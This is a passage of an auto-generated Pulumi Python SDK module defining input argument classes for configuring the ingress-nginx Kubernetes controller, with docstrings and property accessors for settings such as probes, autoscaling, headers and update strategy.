        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations to be added to the udp config configmap.
        """
        # Only record values the caller actually supplied; unset keys stay absent.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if config_map_namespace is not None:
            pulumi.set(__self__, "config_map_namespace", config_map_namespace)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations to be added to the udp config configmap.
        """
        return pulumi.get(self, "annotations")
    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter(name="configMapNamespace")
    def config_map_namespace(self) -> Optional[pulumi.Input[str]]:
        """Namespace the UDP config ConfigMap lives in."""
        return pulumi.get(self, "config_map_namespace")
    @config_map_namespace.setter
    def config_map_namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config_map_namespace", value)
@pulumi.input_type
class ControllerUpdateStrategyArgs:
    """Deployment update strategy: strategy ``type`` plus nested rolling-update
    parameters.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 rolling_update: Optional[pulumi.Input['ControllerRollingUpdateArgs']] = None,
                 type: Optional[pulumi.Input[str]] = None):
        # Only record values the caller actually supplied; unset keys stay absent.
        if rolling_update is not None:
            pulumi.set(__self__, "rolling_update", rolling_update)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="rollingUpdate")
    def rolling_update(self) -> Optional[pulumi.Input['ControllerRollingUpdateArgs']]:
        """Rolling-update parameters (only used when ``type`` selects rolling updates)."""
        return pulumi.get(self, "rolling_update")
    @rolling_update.setter
    def rolling_update(self, value: Optional[pulumi.Input['ControllerRollingUpdateArgs']]):
        pulumi.set(self, "rolling_update", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Update strategy type (e.g. RollingUpdate/Recreate — not validated here)."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerArgs:
    def __init__(__self__, *,
                 add_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 admission_webhooks: Optional[pulumi.Input['ContollerAdmissionWebhooksArgs']] = None,
                 affinity: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']] = None,
                 allow_snippet_annotations: Optional[pulumi.Input[bool]] = None,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 autoscaling: Optional[pulumi.Input['AutoscalingArgs']] = None,
                 autoscaling_template: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]]] = None,
                 config: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 config_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 config_map_namespace: Optional[pulumi.Input[str]] = None,
                 container_name: Optional[pulumi.Input[str]] = None,
                 container_port: Optional[pulumi.Input['ControllerPortArgs']] = None,
                 custom_template: Optional[pulumi.Input['ControllerCustomTemplateArgs']] = None,
                 dns_config: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 dns_policy: Optional[pulumi.Input[str]] = None,
                 election_id: Optional[pulumi.Input[str]] = None,
                 enable_mimalloc: Optional[pulumi.Input[bool]] = None,
                 existing_psp: Optional[pulumi.Input[str]] = None,
                 extra_args: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 extra_containers: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]] = None,
                 extra_envs: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]] = None,
                 extra_init_containers: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]] = None,
                 extra_volume_mounts: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]] = None,
                 extra_volumes: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]] = None,
                 health_check_path: Optional[pulumi.Input[str]] = None,
                 heath_check_host: Optional[pulumi.Input[str]] = None,
                 host_network: Optional[pulumi.Input[bool]] = None,
                 host_port: Optional[pulumi.Input['ControllerHostPortArgs']] = None,
                 hostname: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 image: Optional[pulumi.Input['ControllerImageArgs']] = None,
                 ingress_class_by_name: Optional[pulumi.Input[bool]] = None,
                 ingress_class_resource: Optional[pulumi.Input['ControllerIngressClassResourceArgs']] = None,
                 keda: Optional[pulumi.Input['KedaArgs']] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 lifecycle: Optional[pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs']] = None,
                 liveness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
                 maxmind_license_key: Optional[pulumi.Input[str]] = None,
                 metrics: Optional[pulumi.Input['ControllerMetricsArgs']] = None,
                 min_available: Optional[pulumi.Input[int]] = None,
                 min_ready_seconds: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 node_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 pod_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 pod_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 pod_security_context: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']] = None,
                 priority_class_name: Optional[pulumi.Input[str]] = None,
                 proxy_set_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 publish_service: Optional[pulumi.Input['ControllerPublishServiceArgs']] = None,
                 readiness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
                 replica_count: Optional[pulumi.Input[int]] = None,
                 report_node_internal_ip: Optional[pulumi.Input[bool]] = None,
                 resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None,
                 scope: Optional[pulumi.Input['ControllerScopeArgs']] = None,
                 service: Optional[pulumi.Input['ControllerServiceArgs']] = None,
                 startup_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
                 sysctls: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 tcp: Optional[pulumi.Input['ControllerTcpArgs']] = None,
                 terminate_grace_period_seconds: Optional[pulumi.Input[int]] = None,
                 tolerations: Optional[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']] = None,
                 topology_spread_constraints: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]]] = None,
                 udp: Optional[pulumi.Input['ControllerUdpArgs']] = None,
                 update_strategy: Optional[pulumi.Input['ControllerUpdateStrategyArgs']] = None,
                 watch_ingress_without_class: Optional[pulumi.Input[bool]] = None):
        """
        Arguments for configuring the ingress-nginx controller.

        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] add_headers: Will add custom headers before sending response traffic to the client according to: https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#add-headers.
        :param pulumi.Input['ContollerAdmissionWebhooksArgs'] admission_webhooks: Admission webhook configuration for the controller (see ContollerAdmissionWebhooksArgs).
        :param pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs'] affinity: Affinity and anti-affinity Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#affinity-and-anti-affinity.
        :param pulumi.Input[bool] allow_snippet_annotations: This configuration defines if Ingress Controller should allow users to set their own *-snippet annotations, otherwise this is forbidden / dropped when users add those annotations. Global snippets in ConfigMap are still respected.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations to be added to the controller Deployment or DaemonSet.
        :param pulumi.Input['AutoscalingArgs'] autoscaling: Mutually exclusive with keda autoscaling.
        :param pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]] autoscaling_template: Custom or additional autoscaling metrics ref: https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-custom-metrics
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] config: Will add custom configuration options to Nginx https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] config_annotations: Annotations to be added to the controller config configuration configmap.
        :param pulumi.Input[str] config_map_namespace: Allows customization of the configmap / nginx-configmap namespace.
        :param pulumi.Input[str] container_name: Configures the controller container name.
        :param pulumi.Input['ControllerPortArgs'] container_port: Configures the ports the nginx-controller listens on.
        :param pulumi.Input['ControllerCustomTemplateArgs'] custom_template: Override NGINX template.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] dns_config: Optionally customize the pod dnsConfig.
        :param pulumi.Input[str] dns_policy: Optionally change this to ClusterFirstWithHostNet in case you have 'hostNetwork: true'. By default, while using host network, name resolution uses the host's DNS. If you wish nginx-controller to keep resolving names inside the k8s network, use ClusterFirstWithHostNet.
        :param pulumi.Input[str] election_id: Election ID to use for status update.
        :param pulumi.Input[bool] enable_mimalloc: Enable mimalloc as a drop-in replacement for malloc. ref: https://github.com/microsoft/mimalloc.
        :param pulumi.Input[str] existing_psp: Use an existing PSP instead of creating one.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] extra_args: Additional command line arguments to pass to nginx-ingress-controller E.g. to specify the default SSL certificate you can use `default-ssl-certificate: "<namespace>/<secret_name>"`.
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]] extra_containers: Additional containers to be added to the controller pod. See https://github.com/lemonldap-ng-controller/lemonldap-ng-controller as example.
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]] extra_envs: Additional environment variables to set.
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]] extra_init_containers: Containers, which are run before the app containers are started. - name: init-myservice image: busybox command: ['sh', '-c', 'until nslookup myservice; do echo waiting for myservice; sleep 2; done;']
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]] extra_volume_mounts: Additional volumeMounts to the controller main container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]] extra_volumes: Additional volumes to the controller pod. - name: copy-portal-skins emptyDir: {}
        :param pulumi.Input[str] health_check_path: Path of the health check endpoint. All requests received on the port defined by the healthz-port parameter are forwarded internally to this path.
        :param pulumi.Input[str] heath_check_host: Address to bind the health check endpoint. It is better to set this option to the internal node address if the ingress nginx controller is running in the hostNetwork: true mode.
        :param pulumi.Input[bool] host_network: Required for use with CNI based kubernetes installations (such as ones set up by kubeadm), since CNI and hostport don't mix yet. Can be deprecated once https://github.com/kubernetes/kubernetes/issues/23920 is merged.
        :param pulumi.Input['ControllerHostPortArgs'] host_port: Use host ports 80 and 443. Disabled by default.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] hostname: Optionally customize the pod hostname.
        :param pulumi.Input['ControllerImageArgs'] image: Controller container image configuration (see ControllerImageArgs).
        :param pulumi.Input[bool] ingress_class_by_name: Process IngressClass per name (additionally as per spec.controller).
        :param pulumi.Input['ControllerIngressClassResourceArgs'] ingress_class_resource: This section refers to the creation of the IngressClass resource. IngressClass resources are supported since k8s >= 1.18 and required since k8s >= 1.19
        :param pulumi.Input['KedaArgs'] keda: Mutually exclusive with hpa autoscaling.
        :param pulumi.Input[str] kind: DaemonSet or Deployment.
        :param pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs'] lifecycle: Improve connection draining when ingress controller pod is deleted using a lifecycle hook: With this new hook, we increased the default terminationGracePeriodSeconds from 30 seconds to 300, allowing the draining of connections up to five minutes. If the active connections end before that, the pod will terminate gracefully at that time. To effectively take advantage of this feature, the Configmap feature worker-shutdown-timeout new value is 240s instead of 10s.
        :param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] liveness_probe: Liveness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        :param pulumi.Input[str] maxmind_license_key: Maxmind license key to download GeoLite2 Databases https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases.
        :param pulumi.Input['ControllerMetricsArgs'] metrics: Controller metrics configuration (see ControllerMetricsArgs).
        :param pulumi.Input[int] min_available: Minimum number of controller pods that must remain available (NOTE(review): presumably maps to the chart's PodDisruptionBudget minAvailable — confirm against the chart).
        :param pulumi.Input[int] min_ready_seconds: minReadySeconds to avoid killing pods before we are ready.
        :param pulumi.Input[str] name: Controller name (NOTE(review): presumably used when naming derived resources — confirm against the chart).
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] node_selector: Node labels for controller pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_annotations: Annotations to be added to controller pods.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] pod_labels: labels to add to the pod container metadata.
        :param pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs'] pod_security_context: Security Context policies for controller pods.
        :param pulumi.Input[str] priority_class_name: priorityClassName for the controller pods.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] proxy_set_headers: Will add custom headers before sending traffic to backends according to https://github.com/kubernetes/ingress-nginx/tree/main/docs/examples/customization/custom-headers.
        :param pulumi.Input['ControllerPublishServiceArgs'] publish_service: Allows customization of the source of the IP address or FQDN to report in the ingress status field. By default, it reads the information provided by the service. If disable, the status field reports the IP address of the node or nodes where an ingress controller pod is running.
        :param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] readiness_probe: Readiness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        :param pulumi.Input[int] replica_count: Desired number of controller pod replicas.
        :param pulumi.Input[bool] report_node_internal_ip: Bare-metal considerations via the host network https://kubernetes.github.io/ingress-nginx/deploy/baremetal/#via-the-host-network Ingress status was blank because there is no Service exposing the NGINX Ingress controller in a configuration using the host network, the default --publish-service flag used in standard cloud setups does not apply.
        :param pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs'] resources: Define requests resources to avoid probe issues due to CPU utilization in busy nodes ref: https://github.com/kubernetes/ingress-nginx/issues/4735#issuecomment-551204903 Ideally, there should be no limits. https://engineering.indeedblog.com/blog/2019/12/cpu-throttling-regression-fix/
        :param pulumi.Input['ControllerScopeArgs'] scope: Limit the scope of the controller.
        :param pulumi.Input['ControllerServiceArgs'] service: Controller Service configuration (see ControllerServiceArgs).
        :param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] startup_probe: Startup probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] sysctls: See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
        :param pulumi.Input['ControllerTcpArgs'] tcp: Allows customization of the tcp-services-configmap.
        :param pulumi.Input[int] terminate_grace_period_seconds: How long to wait for the drain of connections.
        :param pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs'] tolerations: Node tolerations for server scheduling to nodes with taints Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/.
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]] topology_spread_constraints: Topology spread constraints rely on node labels to identify the topology domain(s) that each Node is in. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-topology-spread-constraints/.
        :param pulumi.Input['ControllerUdpArgs'] udp: Allows customization of the udp-services-configmap.
        :param pulumi.Input['ControllerUpdateStrategyArgs'] update_strategy: The update strategy to apply to the Deployment or DaemonSet.
        :param pulumi.Input[bool] watch_ingress_without_class: Process Ingress objects without ingressClass annotation/ingressClassName field. Overrides value for --watch-ingress-without-class flag of the controller binary. Defaults to false.
        """
        # Store only the arguments that were explicitly provided; omitted
        # (None) arguments are left unset on the input object.
        if add_headers is not None:
            pulumi.set(__self__, "add_headers", add_headers)
        if admission_webhooks is not None:
            pulumi.set(__self__, "admission_webhooks", admission_webhooks)
        if affinity is not None:
            pulumi.set(__self__, "affinity", affinity)
        if allow_snippet_annotations is not None:
            pulumi.set(__self__, "allow_snippet_annotations", allow_snippet_annotations)
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if autoscaling is not None:
            pulumi.set(__self__, "autoscaling", autoscaling)
        if autoscaling_template is not None:
            pulumi.set(__self__, "autoscaling_template", autoscaling_template)
        if config is not None:
            pulumi.set(__self__, "config", config)
        if config_annotations is not None:
            pulumi.set(__self__, "config_annotations", config_annotations)
        if config_map_namespace is not None:
            pulumi.set(__self__, "config_map_namespace", config_map_namespace)
        if container_name is not None:
            pulumi.set(__self__, "container_name", container_name)
        if container_port is not None:
            pulumi.set(__self__, "container_port", container_port)
        if custom_template is not None:
            pulumi.set(__self__, "custom_template", custom_template)
        if dns_config is not None:
            pulumi.set(__self__, "dns_config", dns_config)
        if dns_policy is not None:
            pulumi.set(__self__, "dns_policy", dns_policy)
        if election_id is not None:
            pulumi.set(__self__, "election_id", election_id)
        if enable_mimalloc is not None:
            pulumi.set(__self__, "enable_mimalloc", enable_mimalloc)
        if existing_psp is not None:
            pulumi.set(__self__, "existing_psp", existing_psp)
        if extra_args is not None:
            pulumi.set(__self__, "extra_args", extra_args)
        if extra_containers is not None:
            pulumi.set(__self__, "extra_containers", extra_containers)
        if extra_envs is not None:
            pulumi.set(__self__, "extra_envs", extra_envs)
        if extra_init_containers is not None:
            pulumi.set(__self__, "extra_init_containers", extra_init_containers)
        if extra_volume_mounts is not None:
            pulumi.set(__self__, "extra_volume_mounts", extra_volume_mounts)
        if extra_volumes is not None:
            pulumi.set(__self__, "extra_volumes", extra_volumes)
        if health_check_path is not None:
            pulumi.set(__self__, "health_check_path", health_check_path)
        if heath_check_host is not None:
            # NOTE: 'heath' (sic) — spelling matches the generated schema; keep as-is.
            pulumi.set(__self__, "heath_check_host", heath_check_host)
        if host_network is not None:
            pulumi.set(__self__, "host_network", host_network)
        if host_port is not None:
            pulumi.set(__self__, "host_port", host_port)
        if hostname is not None:
            pulumi.set(__self__, "hostname", hostname)
        if image is not None:
            pulumi.set(__self__, "image", image)
        if ingress_class_by_name is not None:
            pulumi.set(__self__, "ingress_class_by_name", ingress_class_by_name)
        if ingress_class_resource is not None:
            pulumi.set(__self__, "ingress_class_resource", ingress_class_resource)
        if keda is not None:
            pulumi.set(__self__, "keda", keda)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if lifecycle is not None:
            pulumi.set(__self__, "lifecycle", lifecycle)
        if liveness_probe is not None:
            pulumi.set(__self__, "liveness_probe", liveness_probe)
        if maxmind_license_key is not None:
            pulumi.set(__self__, "maxmind_license_key", maxmind_license_key)
        if metrics is not None:
            pulumi.set(__self__, "metrics", metrics)
        if min_available is not None:
            pulumi.set(__self__, "min_available", min_available)
        if min_ready_seconds is not None:
            pulumi.set(__self__, "min_ready_seconds", min_ready_seconds)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if node_selector is not None:
            pulumi.set(__self__, "node_selector", node_selector)
        if pod_annotations is not None:
            pulumi.set(__self__, "pod_annotations", pod_annotations)
        if pod_labels is not None:
            pulumi.set(__self__, "pod_labels", pod_labels)
        if pod_security_context is not None:
            pulumi.set(__self__, "pod_security_context", pod_security_context)
        if priority_class_name is not None:
            pulumi.set(__self__, "priority_class_name", priority_class_name)
        if proxy_set_headers is not None:
            pulumi.set(__self__, "proxy_set_headers", proxy_set_headers)
        if publish_service is not None:
            pulumi.set(__self__, "publish_service", publish_service)
        if readiness_probe is not None:
            pulumi.set(__self__, "readiness_probe", readiness_probe)
        if replica_count is not None:
            pulumi.set(__self__, "replica_count", replica_count)
        if report_node_internal_ip is not None:
            pulumi.set(__self__, "report_node_internal_ip", report_node_internal_ip)
        if resources is not None:
            pulumi.set(__self__, "resources", resources)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if service is not None:
            pulumi.set(__self__, "service", service)
        if startup_probe is not None:
            pulumi.set(__self__, "startup_probe", startup_probe)
        if sysctls is not None:
            pulumi.set(__self__, "sysctls", sysctls)
        if tcp is not None:
            pulumi.set(__self__, "tcp", tcp)
        if terminate_grace_period_seconds is not None:
            pulumi.set(__self__, "terminate_grace_period_seconds", terminate_grace_period_seconds)
        if tolerations is not None:
            pulumi.set(__self__, "tolerations", tolerations)
        if topology_spread_constraints is not None:
            pulumi.set(__self__, "topology_spread_constraints", topology_spread_constraints)
        if udp is not None:
            pulumi.set(__self__, "udp", udp)
        if update_strategy is not None:
            pulumi.set(__self__, "update_strategy", update_strategy)
        if watch_ingress_without_class is not None:
            pulumi.set(__self__, "watch_ingress_without_class", watch_ingress_without_class)
    @property
    @pulumi.getter(name="addHeaders")
    def add_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Will add custom headers before sending response traffic to the client according to: https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#add-headers.
        """
        return pulumi.get(self, "add_headers")

    @add_headers.setter
    def add_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        """Set ``add_headers``."""
        pulumi.set(self, "add_headers", value)
    @property
    @pulumi.getter(name="admissionWebhooks")
    def admission_webhooks(self) -> Optional[pulumi.Input['ContollerAdmissionWebhooksArgs']]:
        """
        Admission webhook configuration for the controller (see ContollerAdmissionWebhooksArgs).
        """
        return pulumi.get(self, "admission_webhooks")

    @admission_webhooks.setter
    def admission_webhooks(self, value: Optional[pulumi.Input['ContollerAdmissionWebhooksArgs']]):
        """Set ``admission_webhooks``."""
        pulumi.set(self, "admission_webhooks", value)
    @property
    @pulumi.getter
    def affinity(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]:
        """
        Affinity and anti-affinity Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#affinity-and-anti-affinity.
        """
        return pulumi.get(self, "affinity")

    @affinity.setter
    def affinity(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]):
        """Set ``affinity``."""
        pulumi.set(self, "affinity", value)
    @property
    @pulumi.getter(name="allowSnippetAnnotations")
    def allow_snippet_annotations(self) -> Optional[pulumi.Input[bool]]:
        """
        This configuration defines if Ingress Controller should allow users to set their own *-snippet annotations, otherwise this is forbidden / dropped when users add those annotations. Global snippets in ConfigMap are still respected.
        """
        return pulumi.get(self, "allow_snippet_annotations")

    @allow_snippet_annotations.setter
    def allow_snippet_annotations(self, value: Optional[pulumi.Input[bool]]):
        """Set ``allow_snippet_annotations``."""
        pulumi.set(self, "allow_snippet_annotations", value)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations to be added to the controller Deployment or DaemonSet.
        """
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        """Set ``annotations``."""
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter
    def autoscaling(self) -> Optional[pulumi.Input['AutoscalingArgs']]:
        """
        Mutually exclusive with keda autoscaling.
        """
        return pulumi.get(self, "autoscaling")

    @autoscaling.setter
    def autoscaling(self, value: Optional[pulumi.Input['AutoscalingArgs']]):
        """Set ``autoscaling``."""
        pulumi.set(self, "autoscaling", value)
    @property
    @pulumi.getter(name="autoscalingTemplate")
    def autoscaling_template(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]]]:
        """
        Custom or additional autoscaling metrics ref: https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-custom-metrics
        """
        return pulumi.get(self, "autoscaling_template")

    @autoscaling_template.setter
    def autoscaling_template(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]]]):
        """Set ``autoscaling_template``."""
        pulumi.set(self, "autoscaling_template", value)
    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Will add custom configuration options to Nginx https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/.
        """
        return pulumi.get(self, "config")

    @config.setter
    def config(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        """Set ``config``."""
        pulumi.set(self, "config", value)
    @property
    @pulumi.getter(name="configAnnotations")
    def config_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Annotations to be added to the controller config configuration configmap.
        """
        return pulumi.get(self, "config_annotations")

    @config_annotations.setter
    def config_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        """Set ``config_annotations``."""
        pulumi.set(self, "config_annotations", value)
    @property
    @pulumi.getter(name="configMapNamespace")
    def config_map_namespace(self) -> Optional[pulumi.Input[str]]:
        """
        Allows customization of the configmap / nginx-configmap namespace.
        """
        return pulumi.get(self, "config_map_namespace")

    @config_map_namespace.setter
    def config_map_namespace(self, value: Optional[pulumi.Input[str]]):
        """Set ``config_map_namespace``."""
        pulumi.set(self, "config_map_namespace", value)
    @property
    @pulumi.getter(name="containerName")
    def container_name(self) -> Optional[pulumi.Input[str]]:
        """
        Configures the controller container name.
        """
        return pulumi.get(self, "container_name")

    @container_name.setter
    def container_name(self, value: Optional[pulumi.Input[str]]):
        """Set ``container_name``."""
        pulumi.set(self, "container_name", value)
    @property
    @pulumi.getter(name="containerPort")
    def container_port(self) -> Optional[pulumi.Input['ControllerPortArgs']]:
        """
        Configures the ports the nginx-controller listens on.
        """
        return pulumi.get(self, "container_port")

    @container_port.setter
    def container_port(self, value: Optional[pulumi.Input['ControllerPortArgs']]):
        """Set ``container_port``."""
        pulumi.set(self, "container_port", value)
    @property
    @pulumi.getter(name="customTemplate")
    def custom_template(self) -> Optional[pulumi.Input['ControllerCustomTemplateArgs']]:
        """
        Override NGINX template.
        """
        return pulumi.get(self, "custom_template")

    @custom_template.setter
    def custom_template(self, value: Optional[pulumi.Input['ControllerCustomTemplateArgs']]):
        """Set ``custom_template``."""
        pulumi.set(self, "custom_template", value)
    @property
    @pulumi.getter(name="dnsConfig")
    def dns_config(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Optionally customize the pod dnsConfig.
        """
        return pulumi.get(self, "dns_config")

    @dns_config.setter
    def dns_config(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        """Set ``dns_config``."""
        pulumi.set(self, "dns_config", value)
    @property
    @pulumi.getter(name="dnsPolicy")
    def dns_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Optionally change this to ClusterFirstWithHostNet in case you have 'hostNetwork: true'. By default, while using host network, name resolution uses the host's DNS. If you wish nginx-controller to keep resolving names inside the k8s network, use ClusterFirstWithHostNet.
        """
        return pulumi.get(self, "dns_policy")

    @dns_policy.setter
    def dns_policy(self, value: Optional[pulumi.Input[str]]):
        """Set ``dns_policy``."""
        pulumi.set(self, "dns_policy", value)
    @property
    @pulumi.getter(name="electionID")
    def election_id(self) -> Optional[pulumi.Input[str]]:
        """
        Election ID to use for status update.
        """
        return pulumi.get(self, "election_id")

    @election_id.setter
    def election_id(self, value: Optional[pulumi.Input[str]]):
        """Set ``election_id``."""
        pulumi.set(self, "election_id", value)
    @property
    @pulumi.getter(name="enableMimalloc")
    def enable_mimalloc(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable mimalloc as a drop-in replacement for malloc. ref: https://github.com/microsoft/mimalloc.
        """
        return pulumi.get(self, "enable_mimalloc")

    @enable_mimalloc.setter
    def enable_mimalloc(self, value: Optional[pulumi.Input[bool]]):
        """Set ``enable_mimalloc``."""
        pulumi.set(self, "enable_mimalloc", value)
    @property
    @pulumi.getter(name="existingPsp")
    def existing_psp(self) -> Optional[pulumi.Input[str]]:
        """
        Use an existing PSP instead of creating one.
        """
        return pulumi.get(self, "existing_psp")

    @existing_psp.setter
    def existing_psp(self, value: Optional[pulumi.Input[str]]):
        """Set ``existing_psp``."""
        pulumi.set(self, "existing_psp", value)
    @property
    @pulumi.getter(name="extraArgs")
